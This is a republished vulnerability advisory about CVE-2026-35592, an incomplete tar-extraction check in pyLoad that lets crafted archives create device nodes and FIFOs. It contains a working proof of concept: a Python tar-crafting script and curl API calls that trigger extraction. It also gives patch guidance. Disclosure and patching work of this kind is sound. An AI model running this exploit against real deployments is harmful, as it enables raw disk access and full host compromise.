pyLoad, Incomplete Tar Extraction Vulnerability, CVE-2026-35592 (Medium) -DC-Oct2026-3034

Listen to this Post

The vulnerability arises because the hardening added via `UnTar._safe_extractall` for GHSA-mvwx-582f-56r7 strictly validates member names and symlink or hardlink targets, but completely omits checking member types. Furthermore, it invokes `tarfile.extractall` without specifying a `filter=` parameter. On Python runtimes prior to version 3.14, the default extraction filter is fully trusted. Because of this behavior, an attacker who supplies a maliciously crafted tar archive containing device nodes, character devices, or FIFO entries can force pyLoad to create these special files directly on the file system. In standard deployment scenarios where pyLoad executes with root privileges—such as the official Docker container configuration—introducing a block-device or character-device member grants raw disk read and write capabilities, resulting in a complete host compromise. This mechanism is fully reachable by any low-privileged user who has permission to trigger archive extraction through application functions like `ADD` to supply an archive and `STATUS` to invoke ExtractArchive.extract_package. Pre-validation checks in base extractors are similarly limited to names only, leaving python’s `mknod` handling for euid=0 and FIFO creation exposed across supported runtimes from Python 3.9 through 3.13.

DailyCVE Form:

Platform: pyLoad application
Version: Before 0.5.0b3.dev97
Vulnerability: Unsafe extraction flaw
Severity: Medium risk
Date: April 7, 2026

Prediction: Already patched publicly

What Undercode Say

Analysis of the archive extraction flaw reveals that content-sniffed tar archives and non-mapped names bypass extension-based filters like 7z, directly hitting vulnerable Python `tarfile` routines.

Exploit: (Educational Purposes!)

BASE=http://127.0.0.1:8100
craft a tar with: regular marker.txt + a CHRTYPE member (major=1,minor=3) + a FIFOTYPE member
python3 - <<'EOF'
import tarfile, io
t = tarfile.open('dev.bin','w')
t.addfile(tarfile.TarInfo('marker.txt'), io.BytesIO(b'MARKER'))
i = tarfile.TarInfo('nulldev'); i.type = tarfile.CHRTYPE; i.devmajor=1; i.devminor=3; i.mode=0o666
t.addfile(i)
f = tarfile.TarInfo('pipe'); f.type = tarfile.FIFOTYPE
t.addfile(f); t.close()
EOF
as a low-priv user (ADD|STATUS): add a package, place the archive in its download folder,
then trigger extraction
curl -s -X POST "$BASE/api/add_package" -b ed.jar -H "X-CSRFToken: $T" \
-H 'Content-Type: application/json' -d '{"name":"poc","links":["http://x/dev.bin"],"dest":1}'
curl -s -X POST "$BASE/api/service_call" -b ed.jar -H "X-CSRFToken: $T" \
-H 'Content-Type: application/json' \
-d '{"service_name":"ExtractArchive.extract_package","arguments":["<pid>"]}'
ls -l <extract dir>

Protection: from this CVE

In _safe_extractall, reject or skip every member that is not a regular file, directory, or safe link by checking conditions like `member.isdev()` or `isfifo()` to raise an ArchiveError, and pass `filter=”data”` (supported in Python >= 3.12, backporting checks for older runtimes). Apply identical member-type validation in pre-extraction validators.

Impact:

When pyLoad runs as root, a crafted archive can create block or character device nodes at arbitrary paths leading to raw disk read and write access and full host compromise, plant FIFOs causing process hangs or IPC confusion, or set special bits. Non-root deployments remain vulnerable to FIFOs and node entries in user-accessible directory trees.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top